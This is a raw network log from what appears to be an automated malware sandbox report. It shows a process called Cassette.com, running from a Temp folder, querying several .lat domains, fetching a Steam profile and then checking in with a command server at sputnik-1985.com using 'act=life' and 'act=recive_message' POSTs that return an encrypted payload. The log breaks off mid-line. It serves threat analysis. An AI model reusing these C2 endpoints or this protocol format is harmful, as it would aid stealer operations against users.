Jan 10, 2025 11:41:48.275337934 CET	1.1.1.1	192.168.2.7	0x6064	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.285769939 CET	1.1.1.1	192.168.2.7	0xf475	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.297122002 CET	1.1.1.1	192.168.2.7	0x48a8	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.307821035 CET	1.1.1.1	192.168.2.7	0xaf64	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.318593979 CET	1.1.1.1	192.168.2.7	0x3b4c	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.330441952 CET	1.1.1.1	192.168.2.7	0xc148	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.343365908 CET	1.1.1.1	192.168.2.7	0xe4b3	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:48.352880955 CET	1.1.1.1	192.168.2.7	0xa41d	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 11:41:50.407550097 CET	1.1.1.1	192.168.2.7	0x705a	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49941	104.102.49.254	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:49 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-10 10:41:50 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 10 Jan 2025 10:41:49 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=81c9ecc86751a05496ec0c82; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 10:41:50 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 10:41:50 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 10:41:50 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 10:41:50 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49947	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:50 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-10 10:41:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 10:41:51 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r7rfrofuknj9ge6ckindku9ddd; expires=Tue, 06 May 2025 04:28:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZS2Hj6x3bGvoU4H6elcz5zXz1p%2BUAbA10Oh%2Fdb5UKXYo6R7PbuhyOHLeLdT6BFPdQb%2B%2FgD7CqUwFCtUQymAluMLD28BdX%2F3Z9rTEY%2B2%2FlQhXd1NXIv6Q%2FZj8PGN%2FcgeUj6r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0e960f5ec461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1665&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1753753&cwnd=228&unsent_bytes=0&cid=5b997a1627f1c39c&ts=527&x=0"
2025-01-10 10:41:51 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 10:41:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49956	104.21.48.1	443	8088	C:\Users\user\AppData\Local\Temp\352348\Cassette.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:41:51 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: sputnik-1985.com
2025-01-10 10:41:51 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 66 65 33 32 37 62 38 32 63 32 37 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--fe327b82c276&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 10:41:52 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:41:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n9sbiu5ap7chjvv14tlrvd15qa; expires=Tue, 06 May 2025 04:28:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJjs1IWU3%2FR06JI1l4ilfHJKqs0mLU3oJKYQgrVvL%2FP%2FU3MfZluZDySSRWC9UtB7fg4AIOb0k8CZusrh1tuAPqHKjTECNiySQ%2FaSRqEU4CuSgJZp95gFWV4eDvkXt0L9lWux"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc0e9ba9c98c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1787&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1586956&cwnd=238&unsent_bytes=0&cid=8b70376f0034c915&ts=491&x=0"
2025-01-10 10:41:52 UTC	246	IN	Data Raw: 34 33 30 63 0d 0a 38 70 55 65 30 73 72 4f 55 4c 66 72 56 73 58 57 43 72 73 64 47 31 44 6e 6e 4f 54 49 4e 4c 37 76 4a 6f 4a 53 33 50 31 32 68 75 65 4a 74 32 6a 77 38 50 70 38 6c 5a 67 7a 35 2b 78 73 32 6e 46 6f 4e 63 75 2b 68 61 77 57 68 49 6c 48 37 69 47 35 30 56 54 77 69 74 43 76 65 4c 4f 6d 76 54 57 62 79 54 4f 39 39 44 44 67 5a 6a 6b 31 69 62 37 65 36 6c 48 55 6a 55 66 75 4d 4c 32 57 47 66 61 4c 6b 66 31 79 74 61 4b 72 4d 39 4f 4b 4f 71 69 7a 62 39 35 38 63 54 36 4f 38 59 79 6c 46 70 4c 4e 51 2f 68 77 35 74 38 37 34 35 4f 54 32 48 2b 68 6f 65 77 74 6d 35 42 30 6f 4c 67 6f 67 54 39 36 4e 59 58 77 67 71 78 66 31 6f 64 4f 35 6a 47 34 6c 77 62 76 67 5a 72 39 66 4c 61 6a 6f 54 72 48 68 7a 43 76 75 47 6e 55 66 44 6c 38 78 66 6d 65 Data Ascii: 430c8pUe0srOULfrVsXWCrsdG1DnnOTINL7vJoJS3P12hueJt2jw8Pp8lZgz5+xs2nFoNcu+hawWhIlH7iG50VTwitCveLOmvTWbyTO99DDgZjk1ib7e6lHUjUfuML2WGfaLkf1ytaKrM9OKOqizb958cT6O8YylFpLNQ/hw5t8745OT2H+hoewtm5B0oLgogT96NYXwgqxf1odO5jG4lwbvgZr9fLajoTrHhzCvuGnUfDl8xfme
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 36 67 36 63 33 6e 62 6a 49 61 2b 4b 47 66 53 44 30 4f 67 79 71 65 69 72 50 70 58 52 64 4b 2b 34 5a 74 78 38 64 6a 57 45 2f 70 53 6c 56 74 2b 46 54 4f 51 36 73 5a 41 62 36 6f 2b 58 2f 33 57 33 70 36 73 36 30 34 59 33 35 2f 6f 6f 33 6d 63 35 61 73 58 65 6c 71 6c 56 79 49 42 56 6f 43 2f 77 68 6c 54 6a 69 64 43 76 50 4c 61 6d 72 54 2f 56 6d 7a 79 73 76 32 33 4c 64 48 41 2f 69 50 36 4c 6f 46 6e 66 6a 55 50 71 4f 72 47 56 45 4f 6d 49 6c 76 64 38 38 4f 62 73 4e 63 33 4a 62 4f 65 58 62 63 6c 34 64 53 54 48 78 4d 61 31 47 4d 58 4e 51 2b 78 77 35 74 38 63 34 59 61 54 2f 48 4f 7a 6f 4b 63 67 31 5a 73 79 71 72 46 36 33 33 70 33 4f 49 62 73 6a 4b 52 51 33 34 52 50 36 54 57 35 6d 31 53 71 78 5a 66 76 50 4f 6a 6f 6a 54 2f 65 68 54 36 77 74 43 6a 47 4d 57 42 79 67 76 4c Data Ascii: 6g6c3nbjIa+KGfSD0OgyqeirPpXRdK+4Ztx8djWE/pSlVt+FTOQ6sZAb6o+X/3W3p6s604Y35/oo3mc5asXelqlVyIBVoC/whlTjidCvPLamrT/Vmzysv23LdHA/iP6LoFnfjUPqOrGVEOmIlvd88ObsNc3JbOeXbcl4dSTHxMa1GMXNQ+xw5t8c4YaT/HOzoKcg1ZsyqrF633p3OIbsjKRQ34RP6TW5m1SqxZfvPOjojT/ehT6wtCjGMWBygvL
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 59 64 4f 6f 48 37 2b 6d 41 79 6b 33 64 44 47 61 37 76 71 6d 54 48 62 68 7a 4f 78 39 48 65 58 5a 6a 6b 31 69 62 37 65 36 6c 76 55 69 45 48 76 4d 62 53 52 45 65 36 4a 6d 50 6c 2f 6f 71 65 6f 4d 74 6d 42 50 71 71 36 62 4e 46 32 63 6a 6d 44 2f 6f 65 67 46 70 4c 4e 51 2f 68 77 35 74 38 67 34 34 6d 64 2b 44 36 46 71 36 49 38 30 70 39 30 75 50 70 78 6d 58 68 31 63 74 32 2b 69 71 4e 57 31 34 64 41 34 44 65 7a 6d 68 66 6a 68 70 33 77 64 72 36 76 71 44 37 63 68 44 4b 6e 73 32 7a 63 62 58 77 37 69 66 4c 47 35 42 62 62 6c 51 53 34 63 4a 47 59 41 75 65 71 6b 2b 5a 31 38 4c 66 69 4b 35 57 4f 4f 4f 66 73 4b 4e 35 36 63 54 6d 44 39 6f 61 34 55 39 4b 47 52 65 6f 32 76 35 49 59 34 6f 57 52 39 33 71 38 71 4b 73 31 78 35 73 78 6f 61 5a 69 6d 54 45 35 4e 5a 32 2b 33 75 70 67 Data Ascii: YdOoH7+mAyk3dDGa7vqmTHbhzOx9HeXZjk1ib7e6lvUiEHvMbSREe6JmPl/oqeoMtmBPqq6bNF2cjmD/oegFpLNQ/hw5t8g44md+D6Fq6I80p90uPpxmXh1ct2+iqNW14dA4Dezmhfjhp3wdr6vqD7chDKns2zcbXw7ifLG5BbblQS4cJGYAueqk+Z18LfiK5WOOOfsKN56cTmD9oa4U9KGReo2v5IY4oWR93q8qKs1x5sxoaZimTE5NZ2+3upg
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 41 7a 73 5a 59 62 37 49 32 66 2b 48 69 2b 72 71 6f 2f 30 49 59 2b 74 62 78 6d 31 48 52 32 4f 5a 66 2b 69 36 35 61 32 49 56 50 36 6e 44 77 33 78 50 38 78 63 69 33 53 62 32 6e 72 44 48 44 79 53 76 70 72 53 6a 65 63 7a 6c 71 78 66 4b 49 71 6c 6e 51 67 55 2f 6f 4d 62 4b 52 45 2b 47 4d 6d 50 39 75 73 61 79 6b 4d 39 75 47 4e 61 4f 78 62 64 31 34 66 54 53 4b 76 73 6a 71 55 63 54 4e 48 4b 41 66 6d 61 70 57 78 62 2f 51 36 44 4b 70 36 4b 73 2b 6c 64 46 30 71 37 64 6b 30 58 42 2f 4f 34 6e 30 6a 36 46 61 31 34 6c 49 36 54 57 34 6e 68 48 68 68 4a 54 37 64 72 61 72 72 7a 33 61 68 6a 7a 6e 2b 69 6a 65 5a 7a 6c 71 78 64 75 52 6f 56 6a 61 7a 56 75 75 4b 66 36 59 47 4b 54 64 30 50 74 31 74 71 36 70 50 74 53 50 50 4b 4b 38 62 4e 68 35 66 7a 47 4b 2b 6f 4f 72 57 64 69 42 53 Data Ascii: AzsZYb7I2f+Hi+rqo/0IY+tbxm1HR2OZf+i65a2IVP6nDw3xP8xci3Sb2nrDHDySvprSjeczlqxfKIqlnQgU/oMbKRE+GMmP9usaykM9uGNaOxbd14fTSKvsjqUcTNHKAfmapWxb/Q6DKp6Ks+ldF0q7dk0XB/O4n0j6Fa14lI6TW4nhHhhJT7drarrz3ahjzn+ijeZzlqxduRoVjazVuuKf6YGKTd0Pt1tq6pPtSPPKK8bNh5fzGK+oOrWdiBS
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 65 47 65 2b 58 6c 2f 68 34 74 36 53 71 50 64 4f 49 4d 61 32 34 62 39 78 30 64 6a 37 46 73 4d 61 74 54 70 7a 56 42 4d 34 37 72 59 67 58 36 6f 36 47 37 44 79 76 35 72 56 79 30 6f 56 30 2f 2f 52 72 30 6e 52 39 4d 6f 6e 2b 67 71 64 57 7a 6f 4a 44 35 7a 6d 31 6a 52 37 6a 67 70 76 2f 64 37 2b 75 76 6a 37 62 6d 7a 47 31 70 69 69 58 50 33 34 71 78 61 62 47 6e 46 48 4d 6e 55 65 69 41 61 69 63 41 75 2b 49 6e 4c 64 6a 2f 72 48 73 4e 64 6e 4a 62 4f 65 79 5a 39 42 38 64 6a 4f 4d 38 6f 75 76 58 39 6d 4d 51 75 51 36 74 4a 38 53 34 6f 53 56 2f 58 2b 78 6f 71 55 31 33 59 34 33 74 66 51 6d 6d 58 68 68 63 74 32 2b 72 36 31 45 30 70 30 45 2f 33 36 6e 33 78 50 6f 78 63 69 33 65 4c 71 6e 71 44 58 5a 6a 7a 47 68 75 57 6e 57 66 6e 6b 39 67 66 57 50 72 46 66 52 69 45 6e 6b 49 72 Data Ascii: eGe+Xl/h4t6SqPdOIMa24b9x0dj7FsMatTpzVBM47rYgX6o6G7Dyv5rVy0oV0//Rr0nR9Mon+gqdWzoJD5zm1jR7jgpv/d7+uvj7bmzG1piiXP34qxabGnFHMnUeiAaicAu+InLdj/rHsNdnJbOeyZ9B8djOM8ouvX9mMQuQ6tJ8S4oSV/X+xoqU13Y43tfQmmXhhct2+r61E0p0E/36n3xPoxci3eLqnqDXZjzGhuWnWfnk9gfWPrFfRiEnkIr
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 33 64 44 33 64 72 57 69 6f 54 48 61 69 69 61 6d 73 6e 72 5a 63 6e 4d 67 6a 2f 57 44 70 31 76 52 6a 6b 4c 6d 4f 37 4b 4e 48 65 53 47 6d 37 63 79 38 4b 2b 30 63 6f 33 4a 46 37 43 69 59 74 35 7a 62 7a 6d 45 2f 5a 43 6e 52 70 7a 44 42 50 45 33 72 39 39 4d 38 70 57 48 38 47 50 2b 73 65 77 31 32 63 6c 73 35 37 4a 68 33 33 68 2f 50 4a 66 37 67 4b 56 5a 31 59 52 41 36 44 4f 2b 6d 78 44 6a 67 4a 50 37 64 37 65 72 6f 7a 62 63 68 7a 32 6f 39 43 61 5a 65 47 46 79 33 62 36 6e 73 56 58 51 67 41 54 2f 66 71 66 66 45 2b 6a 46 79 4c 64 77 76 71 32 73 4f 4e 4f 4e 4d 61 47 2b 62 64 6c 30 65 6a 32 42 2b 49 4b 6c 56 74 65 45 52 65 59 31 74 4a 51 53 36 59 61 57 38 54 7a 2b 36 4b 73 71 6c 64 46 30 68 36 39 6c 31 58 67 35 4c 63 76 6e 78 71 31 61 6e 4e 55 45 36 7a 79 36 6d 42 54 Data Ascii: 3dD3drWioTHaiiamsnrZcnMgj/WDp1vRjkLmO7KNHeSGm7cy8K+0co3JF7CiYt5zbzmE/ZCnRpzDBPE3r99M8pWH8GP+sew12cls57Jh33h/PJf7gKVZ1YRA6DO+mxDjgJP7d7erozbchz2o9CaZeGFy3b6nsVXQgAT/fqffE+jFyLdwvq2sONONMaG+bdl0ej2B+IKlVteEReY1tJQS6YaW8Tz+6KsqldF0h69l1Xg5Lcvnxq1anNUE6zy6mBT
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 33 57 33 73 37 30 6b 32 4a 6b 7a 35 34 73 6d 6d 57 63 35 61 73 58 4c 68 61 52 59 32 35 74 56 72 52 65 6f 6c 52 50 30 67 6f 66 34 50 50 37 6f 71 6e 4b 4e 32 6e 72 6e 73 48 6d 5a 4a 79 6c 67 33 71 76 56 2f 51 61 4f 6b 67 72 35 63 4b 6a 66 54 4c 62 4c 30 4f 55 38 36 4f 6a 72 4d 63 65 62 4d 71 53 69 61 35 35 42 52 78 57 66 38 34 43 39 52 2b 4b 7a 51 2f 6f 39 75 49 67 46 71 4a 43 54 2b 58 4b 33 76 75 78 38 6c 59 5a 30 2f 34 30 6f 6b 54 39 47 66 4d 58 6d 78 76 49 57 36 59 35 4b 37 6a 65 6f 6a 6c 6e 44 6e 35 33 78 61 36 48 6f 34 6e 4c 54 79 57 7a 33 2b 69 6a 64 62 6a 6c 71 31 61 7a 64 2f 77 57 4c 33 52 62 2f 66 71 66 66 41 71 54 64 77 72 6b 38 6f 75 6a 30 63 70 4b 4b 4a 72 57 79 61 38 39 38 50 67 79 37 30 49 47 73 55 39 75 64 42 73 34 37 71 70 68 55 71 73 57 66 Data Ascii: 3W3s70k2Jkz54smmWc5asXLhaRY25tVrReolRP0gof4PP7oqnKN2nrnsHmZJylg3qvV/QaOkgr5cKjfTLbL0OU86OjrMcebMqSia55BRxWf84C9R+KzQ/o9uIgFqJCT+XK3vux8lYZ0/40okT9GfMXmxvIW6Y5K7jeojlnDn53xa6Ho4nLTyWz3+ijdbjlq1azd/wWL3Rb/fqffAqTdwrk8ouj0cpKKJrWya898Pgy70IGsU9udBs47qphUqsWf
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 66 73 66 4a 57 50 64 50 2f 6d 4a 70 6c 37 61 48 4c 64 72 74 54 78 41 34 2f 61 46 4c 49 76 38 49 5a 55 38 73 58 49 70 54 4c 77 75 75 78 71 6c 63 34 33 74 61 5a 75 32 6d 6c 36 64 62 76 41 6f 61 52 52 33 5a 74 55 39 7a 2f 78 73 53 4c 46 75 36 37 69 66 37 36 6d 71 79 54 45 79 58 72 6e 75 79 69 42 52 6a 6c 36 78 63 48 49 36 6b 36 63 31 51 54 56 4d 37 43 52 45 2f 4b 55 33 64 42 79 74 36 6d 36 49 73 4b 47 65 34 6d 43 53 5a 6b 78 4f 54 54 46 70 74 54 6b 46 74 69 63 42 4c 68 67 37 4d 52 42 74 39 4c 41 70 57 50 2b 73 65 77 6b 6c 64 46 6d 36 66 52 36 6d 53 63 35 64 59 62 73 6c 4b 78 56 79 6f 34 44 33 67 36 5a 6b 52 50 6c 6b 34 44 36 63 4a 47 72 76 54 6a 72 74 79 47 6b 75 6d 62 65 61 57 68 79 79 37 36 4a 36 67 37 6c 7a 51 79 67 44 2f 44 66 44 4b 54 64 30 4d 4a 2f 76 Data Ascii: fsfJWPdP/mJpl7aHLdrtTxA4/aFLIv8IZU8sXIpTLwuuxqlc43taZu2ml6dbvAoaRR3ZtU9z/xsSLFu67if76mqyTEyXrnuyiBRjl6xcHI6k6c1QTVM7CRE/KU3dByt6m6IsKGe4mCSZkxOTTFptTkFticBLhg7MRBt9LApWP+sewkldFm6fR6mSc5dYbslKxVyo4D3g6ZkRPlk4D6cJGrvTjrtyGkumbeaWhyy76J6g7lzQygD/DfDKTd0MJ/v
2025-01-10 10:41:52 UTC	1369	IN	Data Raw: 44 6e 44 65 33 73 31 62 6e 55 6d 73 31 6c 66 33 45 68 6c 48 52 67 58 72 65 42 36 2b 59 42 4b 61 6a 6b 2b 46 2f 38 4f 62 73 4b 70 58 52 64 49 71 6d 62 38 6c 38 4f 78 36 43 38 34 72 71 53 5a 4b 55 42 50 5a 77 35 73 78 61 70 4a 66 51 72 7a 7a 33 71 37 34 67 30 34 6f 69 70 50 4e 57 35 31 4a 72 4e 5a 58 39 78 4a 74 62 32 4a 74 52 34 79 43 35 6f 53 72 4a 6c 35 66 6e 66 2f 4b 4e 6c 6e 44 6b 6e 7a 65 6e 75 6d 2b 5a 4d 54 6b 71 78 61 62 47 68 30 54 62 6e 55 65 69 46 59 54 64 4a 66 4b 47 6b 50 6c 37 38 4f 62 73 50 70 58 52 64 4b 71 6d 62 38 6c 38 4e 54 57 66 2b 63 61 31 47 4d 58 4e 55 71 42 6f 37 64 46 55 39 73 58 49 74 7a 75 2b 70 61 30 78 32 34 6f 6d 74 62 4a 72 7a 33 77 2b 44 4c 76 52 6a 61 74 47 30 5a 78 4a 35 43 61 41 6f 54 50 69 67 4a 66 4a 